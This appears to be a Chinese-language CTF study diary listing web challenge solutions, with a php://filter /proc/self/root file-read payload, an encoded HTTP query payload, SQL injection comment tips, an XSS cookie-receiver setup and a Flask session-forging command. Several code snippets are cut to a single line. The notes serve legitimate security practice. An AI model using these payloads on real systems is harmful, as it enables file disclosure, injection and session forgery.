x
想吃炸鸡day8,真服了为什么php xebug配不好,我记得之前调好过,但是没有记录,现在全忘了,你说我这样一个环境都配不明白的人真的能学好计算机吗
发现一个宝藏教程,非常详细,我能看得懂
[安洵杯 2019]iamthinking
[WMCTF2020]Make PHP Great Again 2.0
1 | ?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php |
1 | ?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php%20 |
[BSidesCF 2020]Hurdles
1 | PUT /hurdles/!?get=flag&%26%3d%26%3d%26=%2500%0a HTTP/1.1 |
[EIS 2019]EzPOP
2次base64编码绕过json_encode,一次seri解码,另一次filter
[HFCTF2020]BabyUpload
debug代码
1 | <?php |
其实不用debug,直接复制粘贴题目然后改一下路径就可以在F:\cry\savePath下发现sess_phpsessid文件
1 | php_binary引擎:键名的长度对应的ascii字符+键名+经过serialize()函数序列化后的值 |
1 | <html> |
复现失败了,好懵啊,明天再看
[SWPU2019]Web4
[GWCTF 2019]mypassword
login.js中的记住密码功能将password存在cookie里面
1 | http://xss/BlueLotus_XSSReceiver-master/install.php |
自建也失败了,一遇到xss就失败,试了bee,collaborator和自建都失败了
哎collaborator刚才成功了,但是带不出来数据
[RoarCTF 2019]Online Proxy
这题环境打不开
[NewStarCTF 2023 公开赛道]ez_sql
拿到题一定要先自己做
闭合前内容要是数据库存在的内容,闭合完加注释,注释前不能加空格,–+成功率最高
[PASECA2019]honey_shop
1 | python flask_session_cookie_manager3.py encode -s "PiNsm9axGc2y4HM54dcjXVACNH0VgD8F7tAUn2Rq" -t "{\"balance\":1338,\"purchases\":[]}" |
如有错误,多多指教